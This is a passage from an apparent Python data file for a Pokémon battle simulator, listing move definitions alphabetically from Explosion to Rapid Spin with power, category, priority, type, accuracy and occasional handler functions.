priority=0,
type="Normal",
handler=handle_explosion,
accuracy=1.000000),
"Extrasensory": DamagingMove("Extrasensory",
power=80,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Extreme Speed": DamagingMove("Extreme Speed",
power=80,
category="Physical",
priority=2,
type="Normal",
accuracy=1.000000),
"Facade": DamagingMove("Facade",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Fairy Lock": Move("Fairy Lock",
category="Non-Damaging",
type="Fairy"),
"Fairy Wind": DamagingMove("Fairy Wind",
power=40,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Fake Out": DamagingMove("Fake Out",
power=40,
category="Physical",
priority=3,
type="Normal",
accuracy=1.000000),
"Fake Tears": Move("Fake Tears",
category="Non-Damaging",
type="Dark"),
"False Swipe": DamagingMove("False Swipe",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Feather Dance": Move("Feather Dance",
category="Non-Damaging",
type="Flying"),
"Feint": DamagingMove("Feint",
power=30,
category="Physical",
priority=2,
type="Normal",
accuracy=1.000000),
"Feint Attack": DamagingMove("Feint Attack",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=0.000000),
"Fell Stinger": DamagingMove("Fell Stinger",
power=30,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Fiery Dance": DamagingMove("Fiery Dance",
power=80,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Final Gambit": DamagingMove("Final Gambit",
power=0,
category="Special",
priority=0,
type="Fighting",
accuracy=1.000000),
"Fire Blast": DamagingMove("Fire Blast",
power=110,
category="Special",
priority=0,
type="Fire",
accuracy=0.850000),
"Fire Fang": DamagingMove("Fire Fang",
power=65,
category="Physical",
priority=0,
type="Fire",
accuracy=0.950000),
"Fire Pledge": DamagingMove("Fire Pledge",
power=80,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Fire Punch": DamagingMove("Fire Punch",
power=75,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Fire Spin": DamagingMove("Fire Spin",
power=35,
category="Special",
priority=0,
type="Fire",
accuracy=0.850000),
"Fissure": DamagingMove("Fissure",
power=0,
category="Physical",
priority=0,
type="Ground",
accuracy=0.300000),
"Flail": DamagingMove("Flail",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Flame Burst": DamagingMove("Flame Burst",
power=70,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Flame Charge": DamagingMove("Flame Charge",
power=50,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Flame Wheel": DamagingMove("Flame Wheel",
power=60,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Flamethrower": DamagingMove("Flamethrower",
power=90,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Flare Blitz": DamagingMove("Flare Blitz",
power=120,
category="Physical",
priority=0,
type="Fire",
handler=handle_flare_blitz,
accuracy=1.000000),
"Flash": Move("Flash",
category="Non-Damaging",
type="Normal"),
"Flash Cannon": DamagingMove("Flash Cannon",
power=80,
category="Special",
priority=0,
type="Steel",
accuracy=1.000000),
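    # Flatter targets the opponent (raising its Sp. Atk while confusing
    # it); the empty boosts dict suggests that effect is not modeled here.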
"Flatter": BoostingMove("Flatter",
category="Non-Damaging",
type="Dark",
boosts={
}),
"Fling": DamagingMove("Fling",
power=0,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Flower Shield": Move("Flower Shield",
category="Non-Damaging",
type="Fairy"),
"Fly": DamagingMove("Fly",
power=90,
category="Physical",
priority=0,
type="Flying",
accuracy=0.950000),
"Flying Press": DamagingMove("Flying Press",
power=80,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.950000),
"Focus Blast": DamagingMove("Focus Blast",
power=120,
category="Special",
priority=0,
type="Fighting",
accuracy=0.700000),
"Focus Energy": Move("Focus Energy",
category="Non-Damaging",
type="Normal"),
"Focus Punch": DamagingMove("Focus Punch",
power=150,
category="Physical",
priority=-3,
type="Fighting",
accuracy=1.000000),
"Follow Me": Move("Follow Me",
category="Non-Damaging",
type="Normal"),
"Force Palm": DamagingMove("Force Palm",
power=60,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Foresight": Move("Foresight",
category="Non-Damaging",
type="Normal"),
"Forest's Curse": Move("Forest's Curse",
category="Non-Damaging",
type="Grass"),
"Foul Play": DamagingMove("Foul Play",
power=95,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Freeze Shock": DamagingMove("Freeze Shock",
power=140,
category="Physical",
priority=0,
type="Ice",
accuracy=0.900000),
"Freeze-Dry": DamagingMove("Freeze-Dry",
power=70,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Frenzy Plant": DamagingMove("Frenzy Plant",
power=150,
category="Special",
priority=0,
type="Grass",
accuracy=0.900000),
"Frost Breath": DamagingMove("Frost Breath",
power=60,
category="Special",
priority=0,
type="Ice",
accuracy=0.900000),
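    # Frustration and Return (further down) are both pinned at power=102,
    # the value each reaches at minimum and maximum happiness respectively.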
"Frustration": DamagingMove("Frustration",
power=102,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Fury Attack": DamagingMove("Fury Attack",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Fury Cutter": DamagingMove("Fury Cutter",
power=40,
category="Physical",
priority=0,
type="Bug",
accuracy=0.950000),
"Fury Swipes": DamagingMove("Fury Swipes",
power=18,
category="Physical",
priority=0,
type="Normal",
accuracy=0.800000),
"Fusion Bolt": DamagingMove("Fusion Bolt",
power=100,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Fusion Flare": DamagingMove("Fusion Flare",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Future Sight": DamagingMove("Future Sight",
power=120,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Gastro Acid": Move("Gastro Acid",
category="Non-Damaging",
type="Poison"),
"Gear Grind": DamagingMove("Gear Grind",
power=50,
category="Physical",
priority=0,
type="Steel",
accuracy=0.850000),
"Geomancy": Move("Geomancy",
category="Non-Damaging",
type="Fairy"),
"Giga Drain": DamagingMove("Giga Drain",
power=75,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Giga Impact": DamagingMove("Giga Impact",
power=150,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Glaciate": DamagingMove("Glaciate",
power=65,
category="Special",
priority=0,
type="Ice",
accuracy=0.950000),
"Glare": Move("Glare",
category="Non-Damaging",
type="Normal"),
"Grass Knot": DamagingMove("Grass Knot",
power=0,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Grass Pledge": DamagingMove("Grass Pledge",
power=80,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Grass Whistle": Move("Grass Whistle",
category="Non-Damaging",
type="Grass"),
"Grassy Terrain": Move("Grassy Terrain",
category="Non-Damaging",
type="Grass"),
"Gravity": Move("Gravity",
category="Non-Damaging",
type="Psychic"),
"Growl": Move("Growl",
category="Non-Damaging",
type="Normal"),
"Growth": BoostingMove("Growth",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1,
'spatk': 1
}),
"Grudge": Move("Grudge",
category="Non-Damaging",
type="Ghost"),
"Guard Split": Move("Guard Split",
category="Non-Damaging",
type="Psychic"),
"Guard Swap": Move("Guard Swap",
category="Non-Damaging",
type="Psychic"),
"Guillotine": DamagingMove("Guillotine",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.300000),
"Gunk Shot": DamagingMove("Gunk Shot",
power=120,
category="Physical",
priority=0,
type="Poison",
accuracy=0.800000),
"Gust": DamagingMove("Gust",
power=40,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
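    # Gyro Ball's power depends on the speed ratio between the two
    # combatants, so it is computed by power_gyro_ball (from handlers)
    # instead of being stored as a constant.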
"Gyro Ball": DamagingMove("Gyro Ball",
power=0,
power_handler=power_gyro_ball,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Hail": Move("Hail",
category="Non-Damaging",
type="Ice"),
"Hammer Arm": DamagingMove("Hammer Arm",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Happy Hour": Move("Happy Hour",
category="Non-Damaging",
type="Normal"),
"Harden": BoostingMove("Harden",
category="Non-Damaging",
type="Normal",
boosts={
'pdef': 1,
}),
"Haze": Move("Haze",
category="Non-Damaging",
type="Ice"),
"Head Charge": DamagingMove("Head Charge",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Head Smash": DamagingMove("Head Smash",
power=150,
category="Physical",
priority=0,
type="Rock",
accuracy=0.800000),
"Headbutt": DamagingMove("Headbutt",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Heal Bell": Move("Heal Bell",
category="Non-Damaging",
type="Normal",
handler=handle_heal_bell),
"Heal Block": Move("Heal Block",
category="Non-Damaging",
type="Psychic"),
"Heal Order": Move("Heal Order",
category="Non-Damaging",
type="Bug"),
"Heal Pulse": Move("Heal Pulse",
category="Non-Damaging",
type="Psychic"),
"Healing Wish": Move("Healing Wish",
category="Non-Damaging",
type="Psychic"),
"Heart Stamp": DamagingMove("Heart Stamp",
power=60,
category="Physical",
priority=0,
type="Psychic",
accuracy=1.000000),
"Heart Swap": Move("Heart Swap",
category="Non-Damaging",
type="Psychic"),
"Heat Crash": DamagingMove("Heat Crash",
power=0,
category="Physical",
priority=0,
type="Fire",
accuracy=1.000000),
"Heat Wave": DamagingMove("Heat Wave",
power=95,
category="Special",
priority=0,
type="Fire",
accuracy=0.900000),
"Heavy Slam": DamagingMove("Heavy Slam",
power=0,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Helping Hand": Move("Helping Hand",
category="Non-Damaging",
type="Normal"),
"Hex": DamagingMove("Hex",
power=65,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Hidden Power [Bug]": DamagingMove("Hidden Power [Bug]",
power=60,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Hidden Power [Dark]": DamagingMove("Hidden Power [Dark]",
power=60,
category="Special",
priority=0,
type="Dark",
accuracy=1.000000),
"Hidden Power [Dragon]": DamagingMove("Hidden Power [Dragon]",
power=60,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Hidden Power [Electric]": DamagingMove("Hidden Power [Electric]",
power=60,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Hidden Power [Fighting]": DamagingMove("Hidden Power [Fighting]",
power=60,
category="Special",
priority=0,
type="Fighting",
accuracy=1.000000),
"Hidden Power [Fire]": DamagingMove("Hidden Power [Fire]",
power=60,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Hidden Power [Flying]": DamagingMove("Hidden Power [Flying]",
power=60,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Hidden Power [Ghost]": DamagingMove("Hidden Power [Ghost]",
power=60,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Hidden Power [Grass]": DamagingMove("Hidden Power [Grass]",
power=60,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Hidden Power [Ground]": DamagingMove("Hidden Power [Ground]",
power=60,
category="Special",
priority=0,
type="Ground",
accuracy=1.000000),
"Hidden Power [Ice]": DamagingMove("Hidden Power [Ice]",
power=60,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Hidden Power [Poison]": DamagingMove("Hidden Power [Poison]",
power=60,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Hidden Power [Psychic]": DamagingMove("Hidden Power [Psychic]",
power=60,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Hidden Power [Rock]": DamagingMove("Hidden Power [Rock]",
power=60,
category="Special",
priority=0,
type="Rock",
accuracy=1.000000),
"Hidden Power [Steel]": DamagingMove("Hidden Power [Steel]",
power=60,
category="Special",
priority=0,
type="Steel",
accuracy=1.000000),
"Hidden Power [Water]": DamagingMove("Hidden Power [Water]",
power=60,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"High Jump Kick": DamagingMove("High Jump Kick",
power=130,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Hold Back": DamagingMove("Hold Back",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Hold Hands": Move("Hold Hands",
category="Non-Damaging",
type="Normal"),
"Hone Claws": BoostingMove("Hone Claws",
category="Non-Damaging",
type="Dark",
boosts={
'patk': 1,
'acc': 1
}),
"Horn Attack": DamagingMove("Horn Attack",
power=65,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Horn Drill": DamagingMove("Horn Drill",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.300000),
"Horn Leech": DamagingMove("Horn Leech",
power=75,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Howl": BoostingMove("Howl",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1
}),
"Hurricane": DamagingMove("Hurricane",
power=110,
category="Special",
priority=0,
type="Flying",
accuracy=0.700000),
"Hydro Cannon": DamagingMove("Hydro Cannon",
power=150,
category="Special",
priority=0,
type="Water",
accuracy=0.900000),
"Hydro Pump": DamagingMove("Hydro Pump",
power=110,
category="Special",
priority=0,
type="Water",
accuracy=0.800000),
"Hyper Beam": DamagingMove("Hyper Beam",
power=150,
category="Special",
priority=0,
type="Normal",
accuracy=0.900000),
"Hyper Fang": DamagingMove("Hyper Fang",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Hyper Voice": DamagingMove("Hyper Voice",
power=90,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Hyperspace Fury": DamagingMove("Hyperspace Fury",
power=100,
category="Special",
priority=0,
type="Dark",
accuracy=0.000000),
"Hyperspace Hole": DamagingMove("Hyperspace Hole",
power=80,
category="Special",
priority=0,
type="Psychic",
accuracy=0.000000),
"Hypnosis": Move("Hypnosis",
category="Non-Damaging",
type="Psychic"),
"Ice Ball": DamagingMove("Ice Ball",
power=30,
category="Physical",
priority=0,
type="Ice",
accuracy=0.900000),
"Ice Beam": DamagingMove("Ice Beam",
power=90,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Ice Burn": DamagingMove("Ice Burn",
power=140,
category="Special",
priority=0,
type="Ice",
accuracy=0.900000),
"Ice Fang": DamagingMove("Ice Fang",
power=65,
category="Physical",
priority=0,
type="Ice",
accuracy=0.950000),
"Ice Punch": DamagingMove("Ice Punch",
power=75,
category="Physical",
priority=0,
type="Ice",
accuracy=1.000000),
"Ice Shard": DamagingMove("Ice Shard",
power=40,
category="Physical",
priority=1,
type="Ice",
accuracy=1.000000),
"Icicle Crash": DamagingMove("Icicle Crash",
power=85,
category="Physical",
priority=0,
type="Ice",
accuracy=0.900000),
"Icicle Spear": DamagingMove("Icicle Spear",
power=25,
category="Physical",
priority=0,
type="Ice",
accuracy=1.000000),
"Icy Wind": DamagingMove("Icy Wind",
power=55,
category="Special",
priority=0,
type="Ice",
handler=handle_icy_wind,
accuracy=0.950000),
"Imprison": Move("Imprison",
category="Non-Damaging",
type="Psychic"),
"Incinerate": DamagingMove("Incinerate",
power=60,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Inferno": DamagingMove("Inferno",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=0.500000),
"Infestation": DamagingMove("Infestation",
power=20,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Ingrain": Move("Ingrain",
category="Non-Damaging",
type="Grass"),
"Ion Deluge": Move("Ion Deluge",
category="Non-Damaging",
type="Electric"),
"Iron Defense": BoostingMove("Iron Defense",
category="Non-Damaging",
type="Steel",
boosts={
'pdef': 2
}),
"Iron Head": DamagingMove("Iron Head",
power=80,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Iron Tail": DamagingMove("Iron Tail",
power=100,
category="Physical",
priority=0,
type="Steel",
accuracy=0.750000),
"Judgment": DamagingMove("Judgment",
power=100,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Jump Kick": DamagingMove("Jump Kick",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.950000),
"Karate Chop": DamagingMove("Karate Chop",
power=50,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Kinesis": Move("Kinesis",
category="Non-Damaging",
type="Psychic"),
"King's Shield": Move("King's Shield",
category="Non-Damaging",
type="Steel"),
"Knock Off": DamagingMove("Knock Off",
power=65,
category="Physical",
priority=0,
type="Dark",
handler=handle_knock_off,
accuracy=1.000000),
"Land's Wrath": DamagingMove("Land's Wrath",
power=90,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Last Resort": DamagingMove("Last Resort",
power=140,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Lava Plume": DamagingMove("Lava Plume",
power=80,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Leaf Blade": DamagingMove("Leaf Blade",
power=90,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Leaf Storm": DamagingMove("Leaf Storm",
power=130,
category="Special",
priority=0,
type="Grass",
accuracy=0.900000),
"Leaf Tornado": DamagingMove("Leaf Tornado",
power=65,
category="Special",
priority=0,
type="Grass",
accuracy=0.900000),
"Leech Life": DamagingMove("Leech Life",
power=20,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Leech Seed": Move("Leech Seed",
category="Non-Damaging",
type="Grass"),
"Leer": Move("Leer",
category="Non-Damaging",
type="Normal"),
"Lick": DamagingMove("Lick",
power=30,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Light Screen": Move("Light Screen",
category="Non-Damaging",
type="Psychic"),
"Light of Ruin": DamagingMove("Light of Ruin",
power=140,
category="Special",
priority=0,
type="Fairy",
accuracy=0.900000),
"Lock-On": Move("Lock-On",
category="Non-Damaging",
type="Normal"),
"Lovely Kiss": Move("Lovely Kiss",
category="Non-Damaging",
type="Normal"),
"Low Kick": DamagingMove("Low Kick",
power=0,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Low Sweep": DamagingMove("Low Sweep",
power=65,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Lucky Chant": Move("Lucky Chant",
category="Non-Damaging",
type="Normal"),
"Lunar Dance": Move("Lunar Dance",
category="Non-Damaging",
type="Psychic"),
"Luster Purge": DamagingMove("Luster Purge",
power=70,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Mach Punch": DamagingMove("Mach Punch",
power=40,
category="Physical",
priority=1,
type="Fighting",
accuracy=1.000000),
"Magic Coat": Move("Magic Coat",
category="Non-Damaging",
type="Psychic"),
"Magic Room": Move("Magic Room",
category="Non-Damaging",
type="Psychic"),
"Magical Leaf": DamagingMove("Magical Leaf",
power=60,
category="Special",
priority=0,
type="Grass",
accuracy=0.000000),
"Magma Storm": DamagingMove("Magma Storm",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=0.750000),
"Magnet Bomb": DamagingMove("Magnet Bomb",
power=60,
category="Physical",
priority=0,
type="Steel",
accuracy=0.000000),
"Magnet Rise": Move("Magnet Rise",
category="Non-Damaging",
type="Electric"),
"Magnetic Flux": Move("Magnetic Flux",
category="Non-Damaging",
type="Electric"),
"Magnitude": DamagingMove("Magnitude",
power=0,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Mat Block": Move("Mat Block",
category="Non-Damaging",
type="Fighting"),
"Me First": Move("Me First",
category="Non-Damaging",
type="Normal"),
"Mean Look": Move("Mean Look",
category="Non-Damaging",
type="Normal"),
"Meditate": BoostingMove("Meditate",
category="Non-Damaging",
type="Psychic",
boosts={
'patk': 1
}),
"Mega Drain": DamagingMove("Mega Drain",
power=40,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Mega Kick": DamagingMove("Mega Kick",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=0.750000),
"Mega Punch": DamagingMove("Mega Punch",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Megahorn": DamagingMove("Megahorn",
power=120,
category="Physical",
priority=0,
type="Bug",
accuracy=0.850000),
"Memento": Move("Memento",
category="Non-Damaging",
type="Dark"),
"Metal Burst": DamagingMove("Metal Burst",
power=0,
category="Physical",
priority=0,
type="Steel",
accuracy=1.000000),
"Metal Claw": DamagingMove("Metal Claw",
power=50,
category="Physical",
priority=0,
type="Steel",
accuracy=0.950000),
"Metal Sound": Move("Metal Sound",
category="Non-Damaging",
type="Steel"),
"Meteor Mash": DamagingMove("Meteor Mash",
power=90,
category="Physical",
priority=0,
type="Steel",
accuracy=0.900000),
"Metronome": Move("Metronome",
category="Non-Damaging",
type="Normal"),
"Milk Drink": Move("Milk Drink",
category="Non-Damaging",
type="Normal"),
"Mimic": Move("Mimic",
category="Non-Damaging",
type="Normal"),
"Mind Reader": Move("Mind Reader",
category="Non-Damaging",
type="Normal"),
"Minimize": BoostingMove("Minimize",
category="Non-Damaging",
type="Normal",
boosts={
'eva': 2
}),
"Miracle Eye": Move("Miracle Eye",
category="Non-Damaging",
type="Psychic"),
"Mirror Coat": DamagingMove("Mirror Coat",
power=0,
category="Special",
priority=-5,
type="Psychic",
accuracy=1.000000),
"Mirror Move": Move("Mirror Move",
category="Non-Damaging",
type="Flying"),
"Mirror Shot": DamagingMove("Mirror Shot",
power=65,
category="Special",
priority=0,
type="Steel",
accuracy=0.850000),
"Mist": Move("Mist",
category="Non-Damaging",
type="Ice"),
"Mist Ball": DamagingMove("Mist Ball",
power=70,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Misty Terrain": Move("Misty Terrain",
category="Non-Damaging",
type="Fairy"),
"Moonblast": DamagingMove("Moonblast",
power=95,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Moonlight": HealingMove("Moonlight",
category="Non-Damaging",
type="Fairy",
healing_percent=0.5),
"Morning Sun": Move("Morning Sun",
category="Non-Damaging",
type="Normal"),
"Mud Bomb": DamagingMove("Mud Bomb",
power=65,
category="Special",
priority=0,
type="Ground",
accuracy=0.850000),
"Mud Shot": DamagingMove("Mud Shot",
power=55,
category="Special",
priority=0,
type="Ground",
accuracy=0.950000),
"Mud Sport": Move("Mud Sport",
category="Non-Damaging",
type="Ground"),
"Mud-Slap": DamagingMove("Mud-Slap",
power=20,
category="Special",
priority=0,
type="Ground",
accuracy=1.000000),
"Muddy Water": DamagingMove("Muddy Water",
power=90,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Mystical Fire": DamagingMove("Mystical Fire",
power=65,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Nasty Plot": BoostingMove("Nasty Plot",
category="Non-Damaging",
type="Dark",
boosts={
'spatk': 2
}),
"Natural Gift": DamagingMove("Natural Gift",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Nature Power": Move("Nature Power",
category="Non-Damaging",
type="Normal"),
"Needle Arm": DamagingMove("Needle Arm",
power=60,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Night Daze": DamagingMove("Night Daze",
power=85,
category="Special",
priority=0,
type="Dark",
accuracy=0.950000),
"Night Shade": DamagingMove("Night Shade",
power=0,
category="Special",
priority=0,
type="Ghost",
handler=handle_night_shade,
accuracy=1.000000),
"Night Slash": DamagingMove("Night Slash",
power=70,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Nightmare": Move("Nightmare",
category="Non-Damaging",
type="Ghost"),
"Noble Roar": Move("Noble Roar",
category="Non-Damaging",
type="Normal"),
"Nuzzle": DamagingMove("Nuzzle",
power=20,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Oblivion Wing": DamagingMove("Oblivion Wing",
power=80,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Octazooka": DamagingMove("Octazooka",
power=65,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Odor Sleuth": Move("Odor Sleuth",
category="Non-Damaging",
type="Normal"),
"Ominous Wind": DamagingMove("Ominous Wind",
power=60,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Origin Pulse": DamagingMove("Origin Pulse",
power=110,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Outrage": DamagingMove("Outrage",
power=120,
category="Physical",
priority=0,
type="Dragon",
accuracy=1.000000),
"Overheat": DamagingMove("Overheat",
power=130,
category="Special",
priority=0,
type="Fire",
accuracy=0.900000),
"Pain Split": Move("Pain Split",
category="Non-Damaging",
type="Normal",
handler=handle_pain_split),
"Parabolic Charge": DamagingMove("Parabolic Charge",
power=50,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Parting Shot": Move("Parting Shot",
category="Non-Damaging",
type="Dark"),
"Pay Day": DamagingMove("Pay Day",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Payback": DamagingMove("Payback",
power=50,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Peck": DamagingMove("Peck",
power=35,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Perish Song": Move("Perish Song",
category="Non-Damaging",
type="Normal"),
"Petal Blizzard": DamagingMove("Petal Blizzard",
power=90,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Petal Dance": DamagingMove("Petal Dance",
power=120,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Phantom Force": DamagingMove("Phantom Force",
power=90,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Pin Missile": DamagingMove("Pin Missile",
power=25,
category="Physical",
priority=0,
type="Bug",
accuracy=0.950000),
"Play Nice": Move("Play Nice",
category="Non-Damaging",
type="Normal"),
"Play Rough": DamagingMove("Play Rough",
power=90,
category="Physical",
priority=0,
type="Fairy",
accuracy=0.900000),
"Pluck": DamagingMove("Pluck",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Poison Fang": DamagingMove("Poison Fang",
power=50,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Poison Gas": Move("Poison Gas",
category="Non-Damaging",
type="Poison"),
"Poison Jab": DamagingMove("Poison Jab",
power=80,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Poison Powder": Move("Poison Powder",
category="Non-Damaging",
type="Poison"),
"Poison Sting": DamagingMove("Poison Sting",
power=15,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Poison Tail": DamagingMove("Poison Tail",
power=50,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Pound": DamagingMove("Pound",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Powder": Move("Powder",
category="Non-Damaging",
type="Bug"),
"Powder Snow": DamagingMove("Powder Snow",
power=40,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Power Gem": DamagingMove("Power Gem",
power=80,
category="Special",
priority=0,
type="Rock",
accuracy=1.000000),
"Power Split": Move("Power Split",
category="Non-Damaging",
type="Psychic"),
"Power Swap": Move("Power Swap",
category="Non-Damaging",
type="Psychic"),
"Power Trick": Move("Power Trick",
category="Non-Damaging",
type="Psychic"),
"Power Whip": DamagingMove("Power Whip",
power=120,
category="Physical",
priority=0,
type="Grass",
accuracy=0.850000),
"Power-Up Punch": DamagingMove("Power-Up Punch",
power=40,
category="Physical",
priority=0,
type="Fighting",
handler=handle_powerup_punch,
accuracy=1.000000),
"Precipice Blades": DamagingMove("Precipice Blades",
power=120,
category="Physical",
priority=0,
type="Ground",
accuracy=0.850000),
"Present": DamagingMove("Present",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Protect": Move("Protect",
category="Non-Damaging",
type="Normal"),
"Psybeam": DamagingMove("Psybeam",
power=65,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psych Up": Move("Psych Up",
category="Non-Damaging",
type="Normal"),
"Psychic": DamagingMove("Psychic",
power=90,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psycho Boost": DamagingMove("Psycho Boost",
power=140,
category="Special",
priority=0,
type="Psychic",
accuracy=0.900000),
"Psycho Cut": DamagingMove("Psycho Cut",
power=70,
category="Physical",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psycho Shift": Move("Psycho Shift",
category="Non-Damaging",
type="Psychic"),
"Psyshock": DamagingMove("Psyshock",
power=80,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psystrike": DamagingMove("Psystrike",
power=100,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Psywave": DamagingMove("Psywave",
power=0,
category="Special",
priority=0,
type="Psychic",
accuracy=0.800000),
"Punishment": DamagingMove("Punishment",
power=0,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Pursuit": DamagingMove("Pursuit",
power=40,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Quash": Move("Quash",
category="Non-Damaging",
type="Dark"),
"Quick Attack": DamagingMove("Quick Attack",
power=40,
category="Physical",
priority=1,
type="Normal",
accuracy=1.000000),
"Quick Guard": Move("Quick Guard",
category="Non-Damaging",
type="Fighting"),
"Quiver Dance": BoostingMove("Quiver Dance",
category="Non-Damaging",
type="Bug",
boosts={
'spatk': 1,
'spdef': 1,
'spe': 1
}),
"Rage": DamagingMove("Rage",
power=20,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Rage Powder": Move("Rage Powder",
category="Non-Damaging",
type="Bug"),
"Rain Dance": Move("Rain Dance",
category="Non-Damaging",
type="Water"),
"Rapid Spin": DamagingMove("Rapid Spin",
